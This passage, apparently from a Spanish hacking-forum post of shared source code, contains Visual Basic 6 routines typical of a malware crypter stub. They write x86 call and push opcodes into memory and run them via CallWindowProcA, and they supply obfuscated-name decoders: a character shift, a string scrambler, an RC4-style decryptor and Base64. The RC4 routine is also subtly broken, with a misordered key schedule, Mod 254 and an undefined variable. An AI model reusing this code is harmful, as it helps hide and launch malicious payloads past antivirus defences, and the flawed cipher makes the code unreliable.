RtlMoveMemory ByVal WWUCG, &H68, &H1: WWUCG = WWUCG + 1
RtlMoveMemory ByVal WWUCG, CLng(RGUIGHC(RMU)), &H4: WWUCG = WWUCG + 4
Next
RtlMoveMemory ByVal WWUCG, &HE8, &H1: WWUCG = WWUCG + 1
RtlMoveMemory ByVal WWUCG, YWVZNYJ - WWUCG - 4, &H4: WWUCG = WWUCG + 4
RtlMoveMemory ByVal WWUCG, &HC3, &H1: WWUCG = WWUCG + 1
qAKEJnhHV = CallWindowProcA(VarPtr(CNZH(0)), 0, 0, 0, 0)
End Function
Public Function XuxhzwVTB(strInput As String, second As Integer)
    Dim first As Integer
    For first = 1 To Len(strInput)
        Mid(strInput, first, 1) = Chr(Asc(Mid(strInput, first, 1)) - second)
    Next first
    XuxhzwVTB = strInput
End Function
Public Function gu1854vbA(Text As String) As String
Dim second As Variant
For second = 1 To Len(Text) Step 2
gu1854vbA = gu1854vbA & StrReverse(Mid(Text, second, 2))
DoEvents
Next second
End Function
Public Function ANSajNNPg(ByVal Data As String, ByVal Password As String) As String
On Error Resume Next
Dim first(0 To 255) As Integer, second As Integer, third As Long, fourth() As Byte
fourth() = StrConv(Password, vbFromUnicode)
For second = 0 To 255
    third = (third + first(second) + fourth(second Mod Len(Password))) Mod 256
    first(second) = second
Next second
fourth() = StrConv(Data, vbFromUnicode)
For second = 0 To Len(Data)
    third = (third + first(third) + 1) Mod 256
    fourth(second) = fourth(second) Xor first(Temp + first((third + first(third)) Mod 254))
Next second
ANSajNNPg = StrConv(fourth, vbUnicode)
End Function
Public Function QVYvQfdt7(sString As String) As String
    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long
    sString = Replace(sString, vbCr, vbNullString)
    sString = Replace(sString, vbLf, vbNullString)
    lTemp = Len(sString) Mod 4
    If lTemp Then Exit Function
    If InStrRev(sString, "==") Then
        iPad = 2
    ElseIf InStrRev(sString, "=") Then
        iPad = 1
    End If
    For lTemp = 0 To 255
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4
            Case 43
                bTrans(lTemp) = 62
            Case 47
                bTrans(lTemp) = 63
        End Select
    Next lTemp
    For lTemp = 0 To 63
        lPowers6(lTemp) = lTemp * 64
        lPowers12(lTemp) = lTemp * 4096
        lPowers18(lTemp) = lTemp * 262144
    Next lTemp
    bIn = StrConv(sString, vbFromUnicode)
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
        lTemp = lQuad And 16711680
        bOut(lPos) = lTemp \ 65536
        lTemp = lQuad And 65280
        bOut(lPos + 1) = lTemp \ 256
        bOut(lPos + 2) = lQuad And 255
        lPos = lPos + 3
    Next lChar
    sOut = StrConv(bOut, vbUnicode)
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
    QVYvQfdt7 = sOut
End Function
saludos y suerte para todos
Imagen

Firma gracias a Bibetto

skype:ELBARTOkpc
Temas similares
Variantes de tema
Responder

Volver a “Fuentes”